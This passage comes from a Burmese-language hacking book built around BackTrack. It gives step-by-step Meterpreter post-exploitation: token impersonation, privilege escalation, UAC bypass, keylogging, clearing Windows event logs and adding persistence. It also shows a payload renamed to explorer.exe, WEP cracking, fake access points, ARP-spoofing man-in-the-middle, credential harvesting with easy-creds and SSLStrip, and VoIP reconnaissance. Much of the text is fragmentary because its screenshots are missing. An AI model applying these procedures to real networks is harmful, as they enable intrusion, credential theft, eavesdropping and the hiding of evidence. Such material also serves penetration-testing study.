ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
use incognito
help
list_tokens –u
impersonate_token \\test-pc\willie
170 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
မ်က္ပြင့္စာေပ 171
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
getsystem –h
getsystem
Run post/windows/escalate/bypassuac
172 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
cd /pentest/exploits/set
./set
Social-Engineering Attacks
Fast-Track Peneration Testing
Third Party Modules
Update the Metasploit Framework
မ်က္ပြင့္စာေပ 173
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
174 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
192.168.10.109
မ်က္ပြင့္စာေပ 175
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
16
၁၀။ ေနာက္ဆံုးတြင္ Listener Port ကို Designate ျပဳလုပ္ရန္ Port တစ္ခုကိုေတာင္းဆိုမည္ျဖစ္သည္။ Port
443 ကိုေရြးခ်ယ္ေပးရမည္ျဖစ္သည္႕အတြက္ 443 ဟု ရိုက္ထည္႕ေပးရပါမည္။
443
176 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
မ်က္ပြင့္စာေပ 177
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
cd /pentest/exploits/set
ls
mv msf.exe explorer.exe
178 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
keyscan_start
မ်က္ပြင့္စာေပ 179
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
Keyscan_dump
180 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
၂။ ထိ႕ု ေနာက္ log removal process ကိုစတင္ရန္အတြက္ irb (a Ruby Interpreter shell) ကို ေအာက္ပါ
Command ကိုအသံုးျပဳျခင္းျဖင့္ ေမာင္းႏွင္ေပးရပါမည္။
irb
မ်က္ပြင့္စာေပ 181
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
log = client.sys.eventlog.open('system')
log = client.sys.eventlog.open('security')
log = client.sys.eventlog.open('application')
log = client.sys.eventlog.open('system')
log = client.sys.eventlog.open('security')
log = client.sys.eventlog.open('application')
182 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
log.clear
မ်က္ပြင့္စာေပ 183
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
run persistence –h
184 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
မ်က္ပြင့္စာေပ 185
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
ettercap -G
186 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
မ်က္ပြင့္စာေပ 187
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
188 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
မ်က္ပြင့္စာေပ 189
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
190 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
Chapter 7
မ်က္ပြင့္စာေပ 191
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
Introduction
ယေန႕ေခတ္တြင္ Wireless Network မ်ားကို ယခင္က စိတ္ပင္မကူးဖူးေသာႏႈန္းထားျဖင့္ ေနရာတိုင္းတြင္
ေတြ႕ရိွႏိုင္ၿပီျဖစ္သည္။ အသံုးျပဳသူအမ်ားစုအတြက္ Internet Access ကိုရရိွႏိုင္ရန္ Ethernet Cable
မ်ားကိုသာ အားကိုးေနရာျခင္းသည္ မသင့္ေတာ္ေသာ ျဖစ္ရပ္တစ္ခုအျဖစ္သာ က်န္ခဲ့ၿပီျဖစ္သည္။ Ethernet
Cable ကိုအသံုးျပဳျခင္း၏ ေကာင္းကြက္တစ္ခုကို ဆြထ
ဲ ုတ္ျပလွ်င္ Wireless Connection မ်ားသည္
Ethernet Connection မ်ားထက္ ပိုမို လံုၿခံဳစိတ္ခ်ရျခင္းပင္ျဖစ္သည္။ ယခုအခန္းတြင္ Mobile Phone
မ်ားအပါအ၀င္ Wireless Networks မ်ားတြင္အသံုးျပဳေသာ Radio Network Traffic မ်ားကို ကိုင္တြယ္
ထိုးေဖာက္နည္းမ်ားကို ေလ့လာရမည္ျဖစ္ပါသည္။ ယခုအခန္းတြင္ ပါ၀င္ေသာ က႑မ်ားမွာ ေအာက္ပါ
အတိုင္းျဖစ္ပါသည္။
192 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
WEP key ကို Crack ျပဳလုပ္ရန္အတြက္ Aircrack ကိုအသံုးျပဳသင့္ပါသည္။ Aircrack suite (Aircrack NG)
တို႕သည္ WEP ႏွင့္ WPA key မ်ားကို Cracking ျပဳလုပ္ႏိုင္ေသာ Program ျဖစ္ၿပီး Network Packet မ်ားကို
Capture ျပဳလုပ္ျခင္း၊ Analyze ျပဳလုပ္ျခင္းတို႕ျပဳလုပ္ႏိုင္ေစကာ ေနာက္ဆံုးအဆင့္ အေနျဖင့္ WEP Key
တစ္ခုကို Crack ျပဳလုပ္ႏိုင္ေစမည္ျဖစ္သည္။
airmon-ng
၃။ ထိ႕ု ေနာက္ wlan0 Interface ကို stop ျပဳလုပ္ရန္လိုအပ္မည္ျဖစ္ၿပီး ေနာက္အဆင့္အရ MAC address
ကို ေျပာင္းလဲရန္အတြက္ျဖစ္ေသာေၾကာင့္ ေအာက္ပါ Command မ်ားကိုအသံုးျပဳရပါမည္။
မ်က္ပြင့္စာေပ 193
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
airodump-ng wlan0
194 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
၁၁။ ထို႕ေနာက္ Router သိ႕ု Traffic အနည္းငယ္ ေပးပို႕မည္ျဖစ္ၿပီး Data မ်ားကို Capture လုပ္ယူမည္
ျဖစ္သည္။ ထို႕ေၾကာင့္ Aireplay Command ကိုေနာက္တစ္ႀကိမ္ထပ္မံအသံုးျပဳရမည္ျဖစ္သည္။ အသံုးျပဳ
မည္႕ပံုစံမွာ aireplay –ng -3 –b [BSSID] – h [MAC Address] ျဖစ္သည္႕အတြက္ တကယ္တမ္းအသံုး
ျပဳႏိုင္ေစရန္ ေအာက္တြင္ေဖာ္ျပထားေသာ Command ကိုအသံုးျပဳရပါမည္။
မ်က္ပြင့္စာေပ 195
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
၁၃။ ေနာက္ဆံုးတြင္ WEP key ကို Crack ျပဳလုပ္ႏိုင္ရန္အတြက္ Aircrack Command ကိုအသံုးျပဳရပါ မည္။
196 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
airmon-ng
မ်က္ပြင့္စာေပ 197
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
airodump-ng wlan0
198 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
မ်က္ပြင့္စာေပ 199
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
ထို႕ေၾကာင့္ အသံုးျပဳပံုကိုစတင္ေလ့လာၾကည္႕ၾကပါမည္။
200 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
၅။ Monitor Mode တြင္ Enable ျပဳလုပ္ၿပီးျဖစ္လွ်င္ Seletct Target Network ေအာက္မွ Rescan
Networks ခလုတ္ေပၚတြင္ Click တစ္္ခ်က္ႏိွပ္ပါ။
မ်က္ပြင့္စာေပ 201
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
၁၀။ Start false access point authentication on victim ခလုတ္တြင္ Click ႏိွပ္ပါ။
၁၂။ Terminal Window ပြင့္လာမည္ျဖစ္ၿပီး Use this packet ဟုေခၚျပခဲ့လွ်င္ Y ကို Click ႏိွပ္ပါ။
၁၄။ ထို႕ေနာက္ Create the ARP packet to be injected on the victim acess point ခလုတ္တြင္ Click
ႏိွပ္ပါ။
၁၅။ Inject the created packet on victim access point ခလုတ္တြင္ Click တစ္ခ်က္ႏိွပ္ပါ။
၁၆။ Termianl Window တစ္ခုထပ္မံေပၚလာမည္ျဖစ္ၿပီး Use this packet ဟုေမးလာပါက Y တြင္ Click
ႏိွပ္ပါ။
202 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
Gerix ကိုအသံုးျပဳ၍ Terminal Window ေပၚတြင္ Command ရိုက္ထည္႕စရာမလိုပဲ WEP Key ကို Crack
ျပဳလုပ္ႏိုင္ေၾကာင္း ျပသခဲ့ၿပီးျဖစ္သည္။ ထိုသို႕အထက္ပါအတိုင္း ေဖာ္ျပထားေသာနည္းလမ္းကို အသံုးျပဳ
ျခင္းျဖင့္ WEP Secured Network ကို လွ်င္ျမန္စြာႏွင့္ ထိေရာက္စြာ ရယူႏိုင္ပါသည္။
မ်က္ပြင့္စာေပ 203
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
၅။ Moinitor Mode သည္ Enable ျဖစ္သြားေသာအခါတြင္ Select Target Network ေအာက္မွ Rescan
Networks ခလုတ္တြင္ Click တစ္ခ်က္ႏိွပ္ေပးရပါမည္။
204 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
၉။ အျခားေသာ Option မ်ားကို Default အျဖစ္အသံုးျပဳႏိုင္ပါသည္။ ထို႕ေနာက္ Fake Access Point ကို
စတင္ရန္အတြက္ Start Fake Access Point ခလုတ္တြင္ Click တစ္ခ်က္ႏိွပ္ေပးပါ။ ေအာက္ေဖာ္ျပပါ ပံုတြင္
ၾကည္႕ရွဳႏိုင္ပါသည္။
မ်က္ပြင့္စာေပ 205
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
၁။ Terminal Window ကိုဖြင့္ၿပီး မိမိတို႕၏ Machine တို႕မွ Traffic မ်ားကို Route ျပဳလုပ္ခြင့္ျပဳေစရန္
အတြက္ IP table မ်ားကို Configure ျပဳလုပ္ႏိုင္ေစရန္ ေအာက္ပါ Command ကိုအသံုးျပဳႏိုင္ပါသည္။
၂။ ထို႕ေနာက္ တိုက္ခိုက္မည္႕ Machine မွ Default gateway သို႕ ပိ႕ု လႊတ္ေသာ Traffic မ်ားကို poison
ျဖစ္ေစရန္အတြက္ Arpspoof ကိုေမာင္းႏွင္ေပးရပါမည္။ ယင္းဥပမာတြင္ Local Network အတြင္းတြင္
192.168.10.115 ဟု IP Address သတ္မွတ္ထားေသာ Windows 7 တင္ထားေသာ ကြန္ပ်ဴတာကို
အသံုးျပဳ၍ ေဖာ္ျပသြားပါမည္။ Arpspoof ကိုအသံုးျပဳရာတြင္ Option ႏွစ္ခုကို ေအာက္ေဖာ္ျပပါအတိုင္း
အသံုးျပဳႏိုင္မည္ျဖစ္သည္။
206 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
Port redirection
ယခုအပိုင္းတြင္ BackTrack ကိုအသံုးျပဳၿပီး Port forwarding သို႕မဟုတ္ Port mapping ဟုေခၚ ဆိုေသာ
Port redirection လုပ္ေဆာင္ခ်က္ကို လုပ္ေဆာင္ၾကည္႕ၾကမည္ျဖစ္သည္။ Port redirection ဆိုသည္မွာ
Packet တစ္ခုကို Port တစ္ခုသို႕လမ္းလႊဲျခင္းျဖစ္ၿပီး ဥပမာအားျဖင့္ Port 80 မွ packet ကို ကြျဲ ပားသည္႕
Port တစ္ခုျဖစ္ေသာ 8080 သို႕၄င္း၏ Traffic မ်ားကို လမ္းလႊဲေပးျခင္းျဖစ္သည္။ ထိုသ႕ို ျပဳလုပ္ျခင္းမွ
ရရိွေသာအက်ိဳးအျမတ္မွာ မ်ားျပားလွၿပီး တိုက္ခိုက္မည္႕စက္၏ Traffic မ်ားကို လံုၿခံဳေသာ port မ်ားမွ
မလံုၿခံဳေသာ Port မ်ားသို႕လမ္းလႊဲေပးႏိုင္သည္။ ထို႕ေၾကာင့္ သတ္မွတ္ထားေသာ စက္ေပၚတြင္ သတ္မွတ္
ထားေသာ Port သို႕ Traffic မ်ားကို လမ္းလႊဲမႈမ်ားကို လုပ္ေဆာင္ေစႏိုင္မည္ ျဖစ္ပါသည္။ ထိုကဲ့သို႕ port
redirection/ forwarding လုပ္ေဆာင္ခ်က္မ်ားကို စတင္လုပ္ေဆာင္ရန္အတြက္
မ်က္ပြင့္စာေပ 207
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
၁။ Terminal Window ကိုဖြင့္ၿပီး မိမိတို႕၏စက္ကို Traffic Route ျပဳလုပ္ရန္ IP Tables မ်ားကို ျပင္ဆင္
ေစႏိုင္ရန္အတြက္ ေအာက္ပါ Command ကိုအသံုးျပဳရပါမည္။
208 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
၁။ Terminal Window ကိုဖြင့္၍ Ettercap ကို -g option ကိုအသံုးျပဳၿပီး GUI Mode ျဖင့္ စတင္ႏိုင္ေစရန္
ေအာက္ပါ Command ကိုအသံုးျပဳရပါမည္။
ettercap -G
မ်က္ပြင့္စာေပ 209
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
210 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
၅။ ထိ႕ု ေနာက္ Hosts List မ်ားကို ေခၚယူရမည္။ Keyboard မွ H ကိုႏိွပ္ျခင္းသို႕မဟုတ္ Hosts> Host List
ကိုေရြးခ်ယ္ျခင္းျဖင့္ Host List ကိုေခၚယူႏိုင္မည္ျဖစ္သည္။
မ်က္ပြင့္စာေပ 211
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
212 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
မ်က္ပြင့္စာေပ 213
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
Packet Sniffing ကိုစတင္ျခင္းမ်ား၊ ARP poison ျပဳလုပ္ေနျခင္းကို ရပ္တန္႕ျခင္း၊ Network ကို ပံုမွန္
အတိုင္းျပန္လည္ေရာက္ရိွေစျခင္းတို႕ကို ေဖာ္ျပခဲ့ပါသည္။ ယခုအဆင့္သည္ အေရးႀကီးဆံုးျဖစ္ၿပီး Network
အရည္အေသြးက်ဆင္းျခင္းကို ေရွာင္လႊဲရန္အတြက္ Network poisoning လုပ္ငန္းစဥ္ကို မရပ္မျဖစ္
ရပ္တန္႕ေပးရပါမည္။
214 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
ေတာင္းသည္႕ Website မ်ား (Gmail, Facebook) မ်ားတြင္ Remember Password Option ကိုအသံုးျပဳ
ခြင့္ေပးသည္႕သေဘာပင္ျဖစ္သည္။
./easy-creds.sh
Poisoning Attacks
FakeAP Attack
Data Review
Exit
Quit Current Poisoning Session တို႕ျဖစ္ပါသည္။
၅။ ထိ႕ု ေနာက္ ေပၚလာေသာ Menu Screen ေပၚတြင္ Oneway ARP Poisoning ကိုေရြးခ်ယ္ရန္အတြက္ 3
ဟုရိုက္ထည္႕၍ Enter ႏိွပ္ပါ။ ယခု Screen တြင္ေပၚလာမည္႕ Menu Option မ်ားမွာ
216 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
wlan0
၇။ Provide path for Saving log files အတြက္ Location ကိုေရြးခ်ယ္ေပးရပါမည္။ ထို႕ေၾကာင့္ ./root
/Easy-Creds ဟူေသာ Path ကိုေရြးခ်ယ္ေပးပါ။
/root/Easy-Creds
၈။ Easy Credentials သည္ IP TABLES ကို Set up ျပဳလုပ္ခိုင္းမည္ျဖစ္သည္။ Do you have a populated
file of victims to use ဟုေဖာ္ျပလာပါက n ဟုသာရိုက္ထည္႕ေပးရပါမည္။
192.168.10.1
မ်က္ပြင့္စာေပ 217
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
192.168.10.115
၁၁။ Would you like to include a sidejacking attack ဟုေမးလာခဲ့ပါက n ကိုရိုက္ၿပီး Enter ကိုသာ ႏိွပ္ပါ။
၁၂။ ေနာက္ဆံုးအေနျဖင့္ SSLStrip, Ettercap, URL Snarf ႏွင့္ Dsniff တိ႕ု ကို Easy Credentials မွ
လုပ္ေဆာင္ေနမည္ျဖစ္သည္။
218 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
မ်က္ပြင့္စာေပ 219
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
220 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
Chapter 8
မ်က္ပြင့္စာေပ 221
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
Introduction
ႈ
Using Svmap
Finding valid extensions
Monitoring, Catpuring, and eavesdropping on VoIP traffic
Using VoIPong
Mastering UCSniff
Mastering Xplico
Capturing SIP authentication
Mastering VoIP Hopper
Causing a denial of service
Attacking VoIP using Metasploit
Sniffing DECT phones ဟူေသာ က႑မ်ားျဖစ္ပါသည္။ ထိ႕ု ေၾကာင့္ စတင္၍ Svmap ကို
အသံုးျပဳျခင္း (Using Svmap) ကိုစတင္ေလ့လာၾကည္႕ၾကပါမည္။
222 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
Using Svmap
ယခုအပိုင္းတြင္ Svmap ကုိအသံုးျပဳ၍ Target Network အတြင္းမွ SIP ႏွင့္ PBX Device မ်ားကို ေဖာ္ထုတ္
အသံုးျပဳျခင္းကို ေလ့လာၾကည္႕ၾကပါမည္။ Svmap သည္ Network ေပၚမွ အားလံုးေသာ Device မ်ား၏
စာရင္းကိုျပဳလုပ္ရန္အတြက္လည္း အသံုးျပဳႏိုင္ပါသည္။ Svmap သည္ VoIP စနစ္မ်ားကို စစ္ေဆးရန္ႏွင့္
Network မ်ားကိုေထာက္ပံ့ေပးေသာ Protocol တစ္ခုအျဖစ္ Python ျဖင့္ဖန္တီးထားေသာ Tools မ်ားျဖစ္
ေသာ SIPVicious Suite ၏ အစိတ္အပိုင္းတစ္ခုလည္းျဖစ္ပါသည္။
Svmap သည္ SIP Device မ်ား၏ ပံုမွန္ Port Setting မ်ား သို႕မဟုတ္ ပံုမွန္မဟုတ္ေသာ
Settings မ်ားကိုအသံုးျပဳ၍ SIP Device မ်ားတြင္ အသံုးျပဳေစႏိုင္ပါသည္။ ထို Feature
သည္ ထုတ္လုပ္သူမ်ားမွ သတ္မွတ္ေပးလိုက္ေသာ နဂို Network မ်ားကို ေက်ာ္လြန္၍
ကြျဲ ပားေသာ Ports မ်ားကိုအသံုးျပဳေသာ ကိစၥရပ္မ်ားတြင္ အသံုး၀င္ေစႏိုင္ပါသည္။
Svmap သည္ တစ္ခုထက္ပိုမိုေသာ Host မ်ားႏွင့္ Port မ်ား သို႕မဟုတ္ တစ္ခုထက္ပိုမို
ေသာ Port မ်ားကိုစစ္ေဆးမည္႕ Host တစ္ခုေပၚတြင္ SIP device မ်ားကို ေနရာခ်ထား
အသံုးျပဳေစႏိုင္ပါသည္။ ၄င္းလုပ္ေဆာင္ခ်က္သည္ အလြန္ႀကီးမားေသာ Network Layout
မ်ားတြင္အသံုးျပဳရန္အတြက္ အလြန္သင့္ေလွ်ာ္ေစပါသည္။
ယခင္က စစ္ေဆးထားေသာ Scan ျပဳလုပ္မႈမ်ားကို ျပန္လည္စတင္ေစႏိုင္ပါသည္။ ၄င္း
လုပ္ေဆာင္ခ်က္သည္ အေၾကာင္းတစ္ခုခုေၾကာင့္ Program ေမာင္းႏွင္ထားျခင္းကို ရပ္
တန္႕လိုေသာအခါ အသံုးျပဳႏိုင္ပါသည္။ ထိုသို႕ရပ္တန္႕ထားေသာ Program ကိုအခ်ိန္မ
ေရြးျပန္လည္စတင္ေစႏိုင္ပါသည္။
မ်က္ပြင့္စာေပ 223
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
cd /pentest/voip/sipvicious
./svmap.py –h
224 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
ယခုအပိုင္းတြင္ Svmap ကိုအသံုးျပဳ၍ Target Network မွ SIP ႏွင့္ PBX device မ်ားကို Scan ျပဳလုပ္ျခင္း
ကိုလုပ္ေဆာင္ခဲ့ပါသည္။ Network ေပၚမွ Devices မ်ား၏ အခ်က္အလက္မ်ားကို စူးစမ္းႏိုင္ေစရန္
ကင္းေထာက္ျခင္းလုပ္ငန္းစဥ္ကို လုပ္ေဆာင္ျခင္းျဖစ္သည္႕အတြက္ ယခုလုပ္ေဆာင္ခ်က္ကို အေရးႀကီး
သည္ဟုသတ္မွတ္ႏိုင္ပါသည္။ ေဖာ္ျပပါ ရည္ရြယ္ခ်က္အတြက္ Sipflanker ကဲ့သို႕ေသာ Tool မ်ားကို
အသံုးျပဳႏိုင္ေသာ္လည္း Svmap ကို လွ်င္ျမန္ေသာ စစ္ေဆးျခင္းမ်ားကိုျပဳလုပ္ႏိုင္ေစရန္ ဒီဇိုင္းဆြထ
ဲ ားေသာ
ေၾကာင့္ အသံုးျပဳရအေကာင္းဆံုး Tool တစ္ခုျဖစ္လာေစပါသည္။
မ်က္ပြင့္စာေပ 225
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
၁။ Terminal Window ကိုဖြင့္၍ Svwar ရိွရာ Directory လမ္းေၾကာင္းသို႕ ေအာက္ပါ Command ကိုအသံုး
ျပဳ၍ ညႊန္းေပးရပါမည္။
cd /pentest/voip/sipvicious
./svwar.py –h
226 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား
ယခုအပိုင္းတြင္ Target Network အတြင္းတြင္ Svwar ကိုအသံုးျပဳ၍ Extension မ်ားကို Locate ျပဳလုပ္
ျခင္းကိုေဖာ္ျပခဲ့ပါသည္။ Network ေပၚမွ Devices မ်ား၏ အခ်က္အလက္မ်ားကို စူးစမ္းႏိုင္ေစရန္
ကင္းေထာက္ျခင္းလုပ္ငန္းစဥ္ကို လုပ္ေဆာင္ျခင္းျဖစ္သည္႕အတြက္ ယခုလုပ္ေဆာင္ခ်က္ကို အေရးႀကီး
သည္ဟုသတ္မွတ္ႏိုင္ပါသည္။ ယခုအပိုင္းတြင္ Svwar ရိွသည္႕ Directory ကိုညႊန္းဆိုသည္႕ လုပ္ေဆာင္
ခ်က္ႏွင့္ စတင္ခဲ့ၿပီး Target Network ေပၚတြင္ Extension မ်ားကို Identify ျပဳလုပ္ရန္ Svwar ကိုအသံုး
ျပဳရမည္႕ လုပ္ေဆာင္ခ်က္မ်ားကို ေဖာ္ျပခဲ့ပါသည္။
Arpspoof: ထို Program သည္ Network ေပၚတြင္ ARP poisoning attack ကို လုပ္
ေဆာင္ခြင့္ျပဳပါသည္။
Wireshark: ထို Programသည္ Network Traffic ကုိဖမ္းယူရန္အတြက္ အသံုးျပဳပါသည္။
Wireshark ကို ေခ်ာင္းေျမာင္းနားေထာင္ရန္အတြက္ ဖမ္းယူထားေသာ RTP traffic
မ်ားကို နားေထာင္ႏိုင္ေသာ Audio ဖိုင္မ်ားအျဖစ္သို႕ ေျပာင္းလဲရန္လည္း အသံုးျပဳပါသည္။
228 မ်က္ပြင့္စာေပ
